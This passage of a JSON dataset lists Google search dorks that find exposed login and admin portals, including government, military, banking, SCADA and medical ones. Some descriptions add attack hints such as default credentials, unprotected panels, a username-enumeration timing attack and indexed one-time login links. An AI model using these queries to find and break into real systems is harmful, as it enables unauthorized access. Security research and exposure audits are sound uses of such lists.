Login.\n-Xploit"}, {"dork": "inurl:\"/wap/LoginPolicy.jsp\"", "description": "Stoneware webnetwork Cloud \nAllows for Portal Cloud login.\n-Xploit"}, {"dork": "inurl:\"remote.php/webdav\" -site:owncloud.org", "description": "Category: Pages Containin Login Portals\nAuthor: Felipe Molina (@femoltor)\nOwncloud WebDav login"}, {"dork": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "description": "Mail :: Welcome to Horde\nGives usernames on Horde email websites and other email websites as well.\n-Xploit"}, {"dork": "inurl:agc/vicidial.php", "description": "This reveals the version of vicidial used and gives the access changing to\n/agc/vicidial.php to vicidial/admin.php to give the direct access to admin\nlogin page ."}, {"dork": "inurl:webgps intitle:\"GPS Monitoring System\"", "description": "Login page for GPS monitoring systems.\nAuthor: Manuel Mancera (sinkmanu)"}, {"dork": "inurl:/cgi-bin/MANGA/index.cgi", "description": "Description: This dork can access many login portal of big companies systems ( use this wisely. )\nBy Sivabalan ( CYBER GENIUS ).."}, {"dork": "inurl:/weblogin.aspx", "description": "inurl:/weblogin.aspx\nDescription : This google dork can access can access many login portals...\nBY Sivabalan ( CYBER GENIUS ).."}, {"dork": "inurl:/tmui/login.jsp", "description": "Administrative Panel Web F5 BIG-IP appliances\ninurl:/tmui/login.jsp\n@firebitsbr"}, {"dork": "inurl:intranet -intext:intranet", "description": "This Dork show millions of access to intranet pages.\nDork by Rootkit Pentester.\nRegards."}, {"dork": "Site:www.comune.*.*.* inurl:login", "description": "# Exploit Title: Dork to find Comune Websites.\n# Google Dork: site:www.comune.*.*.* inurl:login\n# Description : Finds out login portals to Comune Websites.\n# Date: 27/01/2016\n# Author: XDarkCoder"}, {"dork": "inurl:/AirWatch/Login?", "description": "AirWatch Company.\nLogin/Trouble Logging In/ Back to Login Page / Don't remember your Username Login \"Errors\"\n-Xploit"}, {"dork": "site:www.tribunale.*.*.* inurl:login", "description": "# Exploit Title: Dork to find Tribunale Websites.\n# Google Dork: site:www.tribunale.*.*.* inurl:login\n# Description : Finds out login portals on Tribunale Websites. Gov related\n# Date: 07/02/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:login.do intext:government", "description": "# Exploit Title: Dork to find Government and Military website access\nportals.\n# Google Dork: inurl:login.do intext:government\n# Description : Finds out login access portals to Military and Government\nSystems. Enjoy.\n# Date: 09/02/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:intranet site:www.*.gov", "description": "# Exploit Title: inurl:intranet site:www.*.gov\n# Google Dork: inurl:intranet site:www.*.gov\n# Description : Dork to find login portal access to intranet systems\non government websites.\n# Date: 09/02/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin", "description": "inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin\nPages containing login portals\nBruno Schmid"}, {"dork": "intitle:\"Helm : The Web Hosting Control System\"", "description": "Description: Helm Control Panel login page\nGoogle search: intitle:\"Helm : The Web Hosting Control System\"\nAutor: nebo_oben"}, {"dork": "intitle:\"FirstSpirit - login\"", "description": "Description: FirstSpirit Content Management System login page\nGoogle search: intitle:\"FirstSpirit - login\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"D-Link VoIP Router\" \"Welcome\"", "description": "Description: D-Link VoIP Router login page\nGoogle search: intitle:\"D-Link VoIP Router\" \"Welcome\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"ASUS Login\" \"SIGN IN\"", "description": "Description: ASUS router login page\nGoogle search: intitle:\"ASUS Login\" \"SIGN IN\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"8000\" inurl:\"login\"", "description": "Login forms. Mostly ftp.\nGoogle dork:\ninurl:\"8000\" inurl:\"login\"\nD0bby"}, {"dork": "intitle:\"DirectAdmin Login\" \"Please enter your Username and Password\"", "description": "Description: DirectAdmin Web Control Panel login page\nGoogle search: intitle:\"DirectAdmin Login\" \"Please enter your Username\nand Password\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"login.php?action=recover\"", "description": "Description: Password recovery forms\nGoogle search: inurl:\"login.php?action=recover\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"sap-system-login\"", "description": "Description: SAP Web Application Server login page\nGoogle search: inurl:\"sap-system-login\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"sap/hrrcf_a_startpage_ext_cand\" | inurl:\"sap/hrrcf_a_pw_via_email_extern\"", "description": "Description: SAP Web Application Server login page\nGoogle search: inurl:\"sap/hrrcf_a_startpage_ext_cand\" |\ninurl:\"sap/hrrcf_a_pw_via_email_extern\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"Logon - SAP Web Application Server\"", "description": "Description: SAP Web Application Server login page\nGoogle search: intitle:\"Logon - SAP Web Application Server\"\nAuthor: nebo_oben"}, {"dork": "intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"", "description": "Description: SAP Web Application Server login page\nGoogle search: intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"\nAuthor: nebo_oben"}, {"dork": "intext:\"Powered by net2ftp\"", "description": "Description: Web based FTP client login page\nGoogle search: intext:\"Powered by net2ftp\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"Login\" intext:\"Use Web Messaging Lite\"", "description": "Description: Webmail login page\nGoogle search: intitle:\"Login\" intext:\"Use Web Messaging Lite\"\nAuthor: nebo_oben"}, {"dork": "intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"", "description": "Description: OpenERP login page\nGoogle search: intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"mikrotik routeros > administration\" intext:\"mikrotik routeros\" intext:\"configuration page\" -demo intext:\"Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA\"", "description": "Description: MikroTik RouterOS configuration & login page\nGoogle search: intitle:\"mikrotik routeros > administration\"\nintext:\"mikrotik routeros\" intext:\"configuration page\" -demo\nintext:\"Mikrotik, RouterOS and the Mikrotik logo are registered\ntrademarks of Mikrotikls SIA\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"RouterOS\" intitle:\"configuration page\" intext:\"You have connected to a router. Administrative access only.\"", "description": "Description: RouterOS configuration & login page\nGoogle search: intitle:\"RouterOS\" intitle:\"configuration page\"\nintext:\"You have connected to a router. Administrative access only.\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"Honeywell XL Web Controller - Login\" (inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" | inurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" | inurl:\"standard/update.php\")", "description": "Description: Honeywell XL Web Controller login page\nGoogle search: intitle:\"Honeywell XL Web Controller - Login\"\n(inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" |\ninurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" |\ninurl:\"standard/update.php\")\nAuthor: nebo_oben"}, {"dork": "intitle:\"Openbravo\" (inurl:\"openbravo/security/Login_FS.html\" | inurl:\"openbravo/security/Login_Welcome.html\" | inurl:\"openbravo/security/Login_F1.html\" | inurl:\"openbravo/security/Login_F0.html\")", "description": "Description: Openbravo login page\nGoogle search: intitle:\"Openbravo\"\n(inurl:\"openbravo/security/Login_FS.html\" |\ninurl:\"openbravo/security/Login_Welcome.html\" |\ninurl:\"openbravo/security/Login_F1.html\" |\ninurl:\"openbravo/security/Login_F0.html\")\nAuthor: nebo_oben"}, {"dork": "inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"", "description": "Logon - SAP Web Application Server and Job Search: inurl:/sap/bc/webdynpro/sap/ | \"sap-system-login-oninputprocessing\"\nSAP Web Application Server Password Reset: inurl:/sap/bc/webdynpro/sap/ | \"ysccwa_password_reset?sap-client\"\n-Xploit"}, {"dork": "intitle:\"Login Page\" intext:\"Phone Adapter Configuration Utility\"", "description": "Various online Cisco VOIP devices (SPA 112)! More info:\nhttp://www.cisco.com/\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "intitle:vood act=index Gateway >Login", "description": "More VOOD Online Gateway Logins\ninurl:/vood/cgi-bin/vood_view.cgi?act=index\n-Xploit"}, {"dork": "filetype:asp intitle:\" Microsoft Outlook Web Access\"", "description": "Dork who get access to \"Microsoft Outlook Web Access\" Panels.\nBest Regards.\nRootkit Pentester."}, {"dork": "intitle:\"OneAccess WCF\" Username", "description": "Login screen for the OneAccess routers.\nAuthor: Manuel Mancera (@sinkmanu)"}, {"dork": "inurl:backoffice intitle:login", "description": "# Exploit Title: BackOffice Login Portals\n# Google Dork: inurl:backoffice intitle:login\n# Description: Dork to find login portal access to Backoffice CMS..\n# Date: 01/04/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:9443/vsphere-client", "description": "Google dork Description: inurl:9443/vsphere-client\nGoogle search: inurl:9443/vsphere-client\nDate: 2016-02-04\nAuthor: khajj16\nSummary: The VMware vSphere Web Client is the Web-based application that\nconnects users to the vCenter Server to manage installations and handle\ninventory objects in a vSphere environment."}, {"dork": "inurl:/Remote/logon?ReturnUrl", "description": "inurl:/Remote/logon?ReturnUrl \nThis google dork can access many outdated and vulnerable windows servers out there..\nCreated by Sivabalan ( CYBER GENIUS)"}, {"dork": "inurl:/dynamic/login-simple.html?", "description": "inurl:/dynamic/login-simple.html?\nThis google dork can access many linksys Smart wifi accounts .\nCreated by Sivabalan ( CYBER GENIUS )"}, {"dork": "inurl:https://pma.", "description": "Google dork Description: inurl:https://pma.\nGoogle search: inurl:https://pma.\nDate: 2016-11-04\nAuthor: khajj16\nSummary: phpmyadmin login portals intended to handle the administration of\nMySQL or MariaDB with the use of a web browser."}, {"dork": "inurl:inmotionhosting.com:2096/", "description": "# Title: Webmail login pages\n# Google Dork: inurl:inmotionhosting.com:2096/\n# Date: 04/14/2016\n# Author: Stephanie Jensen (https://twitter.com/Steph_J_)\nSummary\nSearching with omitted results gives you webmail login pages. Some \nsearch results even display login credentials in search result titles."}, {"dork": "inurl:dynamic.php?page=mailbox", "description": "# Exploit Title: Webmail login pages\n# Google Dork: inurl:dynamic.php?page=mailbox\n# Date: 04/14/2016\n# Author: Stephanie Jensen\nSummary\nwebmail login pages - many with obvious usernames in search results. \nLogin attempts seem unlimited."}, {"dork": "inurl:\"/owncloud/index.php\" -github -forum", "description": "Google dork Description: inurl:\"/owncloud/index.php\" -github -forum\nGoogle search: inurl:\"/owncloud/index.php\" -github -forum\nDate: 2016-29-04\nAuthor: khajj16\nSummary: Owncloud login portal."}, {"dork": "inurl:\"/eyeos/index.php\" -github -forum", "description": "Google dork Description: inurl:\"/eyeos/index.php\" -github -forum\nGoogle search: inurl:\"/eyeos/index.php\" -github -forum\nDate: 2016-29-04\nAuthor: khajj16\nSummary: WebOS login portal for EyeOS."}, {"dork": "intitle:\"MODX CMF Manager Login\"", "description": "Searches for MODX login portals, even if admin portal URL is not at usual\nlocation of /manager/\nAuthor: Charles Holtzkampf"}, {"dork": "inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken clock drift detected\"", "description": "Description : inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken\nclock drift detected\"\nSearch : inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken\nclock drift detected\"\nDate: 05-06-2016\nAuthor: Krishna\nSummary:Exposed SSL VPN Login pages for Fortiguard SSL VPN."}, {"dork": "inurl:Dialin/Conference.aspx", "description": "# Exploit Title: Google dork to discover Lync Server 2013\n# Google Dork: inurl:Dialin/Conference.aspx\n# Date: 2016-08-03\n# Exploit Author: @nyxgeek\n# Vendor Homepage: microsoft.com\nThis search reveals Lync Server 2013 dialin login pages. A user \nenumeration\ntiming attack can be performed against these pages. Long response time\nindicates that the username is invalid. Short response time indicates \nthat\nyou have a valid username."}, {"dork": "intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0", "description": "Description: Exposed Active Directory Federation Services (ADFS or AD FS) User Sign-in Pages\nGoogle search: intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0\nDork Author: Serhii Pronin"}, {"dork": "inurl:/human.aspx?r=", "description": "Secure ftp server Logins\nHosted by \"moveit\" company\nBig businesses.\nAlso inurl:/human?=arg12\n-Xploit"}, {"dork": "inurl:\"https://vdi\"", "description": "VMware Horizon Logins\nAlso other dorks \ninurl:/portal/webclient/index.html#/warning\ninurl:\"https://mydesktop-\"\ninurl:\"https://view\"\ninurl:\"https://mypc\"\n-Xploit"}, {"dork": "inurl:/web/device/login?lang=1", "description": "name =find h3c web manage login pages\nGoogle dork Description: inurl:/web/device/login?lang=1\nGoogle search: inurl:/web/device/login?lang=1\nAuthor: id_No2015429\nFind h3c web manage login pages.\nSummary: h3c web manage login pages."}, {"dork": "intitle:\"SonicWALL - Authentication\"", "description": "SonicWALL firewall login portals\nGoogle Dork: intitle:\"SonicWALL - Authentication\"\nDate: 2016-11-28\nAuthor: Devendra Singh Solanki"}, {"dork": "intitle:\"Integrated Dell Remote Access Controller 6 - Enterprise\"", "description": "Dell Remote Access Controller 6 - Enterprise Web Login Portals\nGoogle Dork: intitle:\"Integrated Dell Remote Access Controller 6 -\nEnterprise\"\nDate: 2016-11-29\nAuthor: Devendra Singh Solanki"}, {"dork": "intitle:\"Vigor Login Page\"", "description": "Vigor router login panel\nGoogle Dork: intitle:\"Vigor Login Page\"\nDate: 2016-12-01\nAuthor: Devendra Singh Solanki"}, {"dork": "inurl:action=php.login", "description": "#GoogleDork:inurl:action=php.login\n#you can found a different admin page\n#Dork Author: @HACKERHMB"}, {"dork": "intitle:Login \"Login to pfSense\" \"Password\" \"LLC\"", "description": "Google Dork: intitle:Login \"Login to pfSense\" \"Password\" \"LLC\"\n#Title: pfSense firewall administrative login page\n#Author: Simon Gurney\n#Website: blog.synack.co.uk\nAdmin login pages for pfSense firewalls."}, {"dork": "intitle:\"Login - OpenStack Dashboard\" inurl:\"dashboard\"", "description": "Found this: intitle:\"Login - OpenStack Dashboard\" inurl:\"dashboard\"\r\n\r\n\r\n\r\nVer\u00f3nica Ovando (AKA verovan)"}, {"dork": "inurl:\".reset;-.pwd }\" \"~ User\"", "description": "Also here is more.\ninurl:\"/ctl/SendPassword?returnurl=\" \"08\"\ninurl:\"/Login/tabid/Default.aspx?\" \"73\"\n-Where the number is you can put any number you want from 1-1000 or more.\n-Xploit"}, {"dork": "inurl:\"/admin.php?cont=\"", "description": "Finds Radius Manager login pages (mostly HTTP!)\nDxtroyer"}, {"dork": "inurl:\"/SecureAuth1\"", "description": "SecureAuth \nLogins, Password Resets\ninurl:\"/SecureAuth1\" --(Replace number from 1-100)\n-Xploit"}, {"dork": "inurl:/j_security_check;jsessionid=", "description": "Google dork : inurl:/j_security_check;jsessionid=\nDescription : This google dork can access a lot of login pages \nCreated by dekingofcyber ( sivabalan )"}, {"dork": "inurl:\"/fmi/webd\"", "description": "FileMaker WebDirect Logins \nAnother file cloud folder.\n-Xploit"}, {"dork": "inurl:/helpdesk/staff/index.php?", "description": "Google dork to find \" Kayako software-ticketing portal login page\"\nGogle dork :* inurl:/helpdesk/staff/index.php?*\n*Regards,*\n*Dagalti kick*"}, {"dork": "intitle:\"Django site admin\" inurl:admin -site:stackoverflow.com -site:github.com", "description": "Identify admin page for websites built with Python Django framework\r\n\r\nSreeram Sasikumar"}, {"dork": "inurl:\"xamppsecurity.php\"", "description": "inurl:\"xamppsecurity.php\"\r\n\r\nps.: with this dork it is possible to enter several administrative panels of xampp that do not have password for protection.\r\n\r\nAtt.\r\n huehuehuebrbrbr"}, {"dork": "inurl:https://owa", "description": "*Google dork description: *Sites running Outlook Web Application (OWA) and\r\nin extension run e-mail via Microsoft Exchange\r\n\r\n*Google Search: *inurl:https://owa\r\n\r\n*Submitted by:* Alfie_the-infosec_"}, {"dork": "inurl:\"communique_detail.php?id=\"", "description": "*Google Dork Description*:inurl:\"communique_detail.php?id=\"\r\n\r\n-with this dork it is possible to access multiple communique detail login\r\npages of different sites.\r\n-Author: Ashwin Rajeev"}, {"dork": "intitle:\"Panel Administracyjny\"", "description": "*Google Dork : intitle:\"Panel Administracyjny\"*\r\n\r\n*Description : Show admin panel of .pl (Poland) websites. *\r\n*Author: P5N4PPZ*"}, {"dork": "inurl:\"/moodle/login/index.php\"", "description": "Finds Moodle Login pages\r\n\r\nDxtroyer"}, {"dork": "inurl:\"https://mylogin.\"", "description": "Finds login pages, mostly on educational websites\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/libs/granite/core/content/login.html\"", "description": "The following dork will give you the list of AEM Installed server. (Adobe\r\nExperience Manager)\r\ninurl:\"/libs/granite/core/content/login.html\""}, {"dork": "inurl:\"/jde/E1Menu.maf\"", "description": "This dork is to search for public available jd edward ERP portals.\r\n\r\nDork: inurl:\"/jde/E1Menu.maf\"\r\n\r\nAs per Oracle documentation the default username: DEMO and password: DEMO"}, {"dork": "inurl:/login/index.php intitle:CentOS", "description": "inurl:/login/index.php intitle:CentOS\r\n\r\nFinds CentOS Web Panel Login Pages. See http://centos-webpanel.com"}, {"dork": "inurl:/frontend/paper_lantern/index.html", "description": "inurl:/frontend/paper_lantern/index.html\r\n\r\nThis Dork is useful to search and find CPANEL login"}, {"dork": "inurl:\"/forms/frmservlet?config=\" login", "description": "Various login portals and custom applications using Oracle executable forms\r\nservices, to use this dork properly it requires java running in the browser.\r\n\r\nBruno Schmid"}, {"dork": "intitle:tm4web login | logon | account | member | password", "description": "Login portals from web applications using the TM4J(Topic Maps 4 Java) topic\r\nmap engine.\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:Login to CMS Made Simple + inurl:/cmsms", "description": "intitle:Login to CMS Made Simple + inurl:/cmsms\r\n\r\nCMS Made Simple login pages\r\n\r\nManhNho"}, {"dork": "intitle:\"Control Panel\" + emailmarketer", "description": "intitle:\"Control Panel\" + emailmarketer\r\n\r\nEmail Marketer login panel\r\n\r\nManhNho"}, {"dork": "intitle:Control Panel \"Login with your username and password below.\" +\"Email\" +\"Powered by\"", "description": "*What: *Vulnerable Interspire Email Marketer installs and their login pages.\r\n\r\nThe dork from the recently published paper\r\nhttps://security.infoteam.ch/en/blog/posts/from-hacked-client-to-0day-discovery.html\r\n\r\n*By: *edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "intitle:\"Please login\" \"username\" \"password\"", "description": "Many login portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"username\" \"password\" intitle:\"login here\"", "description": "More login portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"form_id\" login username password", "description": "Login portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:access your account\" login", "description": "Login and admin portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:your access id is\" login -youtube", "description": "Login portals and sometimes instructions how to get or reset user access IDs\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"private login\" username -github", "description": "Login portals to private/exclusive area\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:intranet/login login", "description": "Login portals to intranets\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"partners login\"", "description": "Login portals\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"login.php?referer=profile.php\"", "description": "Login portals from Coppermine Photo Gallery\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login credit\" \"login\"", "description": "Login portals mainly from finance/banking websites\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login form\" \"powered by\" -tutorial", "description": "Many login portals from several frameworks.\r\nAlso try intitle:\"login form\" \"powered by\" | \"CMS\" -tutorial\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"department\" | \"agency\" | \"government\" \"intitle:\"login form\" -youtube -template", "description": "Governments, agencies and politic related login portals.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"service\" | \"military\" | \"federal\" \"intitle:\"login form\" -youtube -template -stackoverflow", "description": "Law, federal departments and military and service related login portals.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"login\" \"secure\" \"intitle:\"online banking\" -youtube -template -stackoverflow -stackexchange", "description": "Online banking login portals...\r\n\r\nalso try:\r\n\"login\" \"secure\" \"intitle:\"private banking\" -youtube -template\r\n-stackoverflow -stackexchange\r\n\r\n\"login\" \"secure\" \"intitle:\"investment banking\" -youtube -template\r\n-stackoverflow -stackexchange\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login\" | intitle:\"sign in\" \"member\" \"private\" \"admin\" \"club\" -stackoverflow -github -youtube", "description": "More login portals\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login\" | intitle:\"hospital\" \"patient\" \"clinic\" \"admin\" \"medical\" \"login\" -stackoverflow -github -youtube", "description": "Medical related login portals\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"login\" intitle:\"scada login\"", "description": "Scada login portals\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/forgotpwd.jspx\"", "description": "Oracle Identity Manager password Reset pages. Sometimes it will auto login\r\nas anonymous user by default.\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"ssologin/\" -github.com", "description": "Pages containing login portals.\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"cmd=auth?\" -github -stackoverflow -gitlab", "description": "Many login portals\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/initiatesso?providerid=\" -github.com", "description": "Pages containing login portals with high probability to be an Oracle Access\r\nManager portal typical containing \"initiatesso?providerid\" in the url\r\n\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"Oracle peoplesoft sign in\" inurl:\"cmd=login?\" -github -stackoverflow -gitlab", "description": "Oracle PeopleSoft login portals\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/startSSO.ping?\" -stackoverflow.com", "description": "Pages containing Ping Identity\u00ae's and PingFederate\u00ae login portals mainly\r\nused by high profiled companies\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/Admin/Login?ReturnUrl=\" -github.com -gitlab.com", "description": "Admin login portals\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"login\" inurl:\"account/auth\" -github -gitlab -stackoverflow", "description": "Login portals... Most of them use ASPT.NET technology.\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://www.linkedin.com/in/schmidbruno"}, {"dork": "\"login\" \"adp login\" -adplogin.us -adplogin.org -adplogin.net", "description": "Login portals from ADP Login which is mainly used in the following fields:\r\n\r\n - Human Capital Management\r\n - Payroll Services\r\n - Talent Management\r\n - HR Management\r\n - Affordable Care Act\r\n - Benefits Administration\r\n - Time & Attendance\r\n - HR Business Process Outsourcing (HR BPO)\r\n - Professional Employer Organization (PEO)\r\n - Retirement Plans\r\n - Insurance Plans\r\n - Tax & Compliance\r\n - Payment Solutions\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:default.aspx?ReturnUrl=/spssmr -stackoverflow -youtube.com -github", "description": "IBM\u00ae SPSS\u00ae Data Collection Interviewer Server Administration login portals\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/SAMLLogin/\" -github", "description": "Security Assertion Markup Language (SAML) Login portals\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"BMC Remedy Mid Tier\" \"login\"", "description": "BMC Remedy login portals\r\n\r\n\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/mailscanner/login.php", "description": "Google Dork :: inurl:/mailscanner/login.php to get email filter \r\nappliance login page (MailWatch Login)\r\n\r\n\r\nNisankh Acharjya"}, {"dork": "intitle:\"Open Source HRMS\" intext:\"powered by\"", "description": "This dork will show Human Resource Management System Login Page\r\n\r\nintitle:\"Open Source HRMS\" intext:\"powered by\"\r\n\r\n\r\nAvles Nas"}, {"dork": "intitle:\"Login\" inurl:\"/itim/self\" | inurl:\"/itim/ui\" -ibm.com", "description": "Pages using \"IBM Tivoli Identity Manager\" as login portals.\r\n\r\nVaibhav Dhote"}, {"dork": "intext:\"this login can be used only once\" inurl:user intitle:\"reset password\"", "description": "This dork can hunt out vulnerable drupal websites with their password reset\r\npages of various accounts for account takeover.\r\n\r\n*Description*:\r\n\r\nDrupal users using PRLP (Password Reset Landing Page) module. When this\r\nmodule is installed, If a user requests a new password, the requested user\r\nwill be mailed with a one time login link. These link comes with a expiry\r\ndate and time. This one time login link enabled the users to change their\r\npasswords without asking for current password and also let them to login to\r\ntheir account without changing their password.\r\n\r\nAccidentally, these One Time Login Links are indexed by Search Engines and\r\nthis allowed any user to login as other user and change their passwords\r\nusing this One Time Login Link.\r\n\r\n*Dork*:\r\n\r\nintext:\u201dthis login can be used only once\" inurl:user intitle:\"reset password\"\r\n\r\n*Category*: Pages Containing Login Portals\r\n\r\n*Date*: 11-05-2018\r\n\r\n\r\nThe Infected Drake (@_tID)"}, {"dork": "intitle:login laboratory | \"nuclear\" | physics \"password\" authentication", "description": "Login portals of specific interest\r\n\r\nFor other fields also try:\r\n\r\nintitle:login institute of | national | center of | embassy | federation |\r\ndeputy \"password\"\r\n\r\nintitle:login medicine | genetics | microbiology | cancer | neurologic\r\n\"password\"\r\n\r\nintitle:login democratic | nationalist | republican | socialist | federal\r\n\"password\"\r\n\r\nintitle:login aviatics | aviation | aeronautic | naval \"password\"\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"user_login/\" bitcoin | crypto | wallet", "description": "Login portals related to cryptocurrency wallets and cryptocurrency excange\r\nweb apps\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"Netgear\u2122 - NETGEAR Configuration Manager Login\"", "description": "intitle:\"Netgear\u2122 - NETGEAR Configuration Manager Login\"\r\n\r\nLogin page.\r\n\r\nManhNho"}, {"dork": "allintitle: \"Flexi Press System\"", "description": "This dork will show login portal: Flexi Press System\r\n\r\nmil1200"}, {"dork": "intext:2001.-.2018.umbraco.org ext:aspx", "description": "Identify admin login portals for websites built with Umbraco CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "inurl:/CMSPages/logon ext:aspx", "description": "Retrieve Administration logins of websites using Kentico CMS.\r\n\r\ninurl:/cmsdesk intitle:CMS.Login\r\n\r\ninurl:/CMSPages/logon ext:aspx intitle:CMS.Login\r\n\r\nThese two dorks also retrieve more logins of website which use Kentico CMS.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "inurl:/index.php/login intext:Concrete.CMS", "description": "Identify login portals of website that use Concrete CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "\"Powered by Open Source Chat Platform Rocket.Chat.\"", "description": "This Google Dork displays open Login Portals for RocketChat.\r\n\r\nFound by Lewis, @LewisBugBounty // fifteen@riseup.net."}, {"dork": "inurl:'/blog/Account/login.aspx'", "description": "Dorks about BlogEngine.NET login panel\r\n\r\nAuthor: Brain Reflow"}, {"dork": "inurl:\"/logon.aspx?ReturnUrl=\"", "description": "Several login portals\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.jsp?permissionViolation", "description": "JIRA login portals\r\n\r\nAlso try inurl:user_role=ADMIN\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:Connect.with.Finalsite intitle:admin -facebook", "description": "Admin login pages of website using Finalsite CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "inurl:/contao/main ext:php -community -github", "description": "Retrieve login page of website that use Contao CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "inurl:/sitefinity intext:Copyright.(c)*Telerik. Site.Finity", "description": "This dork retrieves all the login page of website that use Sitefinity CMS.\r\n\r\n\r\ninurl:/sitefinity/login intext:Login.to.manage.the.site.\r\n\r\nThe above dork also retrieves more login page of website that use\r\nSitefinity CMS.\r\n\r\n\r\nAuthor: Abhinand Das A"}, {"dork": "inurl:/admin intitle:Pulse.CMS -pulsecms.com", "description": "Retrieve all admin page of websites build using Pulse CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "intext:Omeka*Username Powered.by.Omeka inurl:admin -github -omeka.org", "description": "Retrieve all admin login page of websites that use Omeka CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "intitle:Wagtail.-.Sign in intext:Javascript.is.required.to.use.Wagtail", "description": "Retrieve all admin page of website that use Wagtail CMS.\r\n\r\n\r\nMore: inurl:admin intitle:wagtail -wagtail.io -stackoverflow -github\r\n\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "\"2004 - 2018 iboss, Inc. All rights reserved.\"", "description": "Find iBoss login portals. \r\n\r\n~ CrimsonTorso"}, {"dork": "intitle:\"MyWebSQL\" + \"User ID: Password:\"", "description": "intitle:\"MyWebSQL\" + \"User ID: Password:\"\r\n\r\nMyWebSQL login pages\r\n\r\nManhNho"}, {"dork": "intitle:\"SSL VPN Service\" + intext:\"Your system administrator provided the following information to help understand and remedy the security conditions:\"", "description": "Show Cisco asa login web page which maybe contain new Cisco's CVEs\r\n\r\nManhNho"}, {"dork": "filetype:png | \"proportal\"", "description": "Find ProPortal login portals. \r\n\r\nalso: \"Version 18.2.0\" \"ProPortal\"\r\n\r\n~ CrimsonTorso"}, {"dork": "frmLogin", "description": "Find websites using frmLogin login portals. 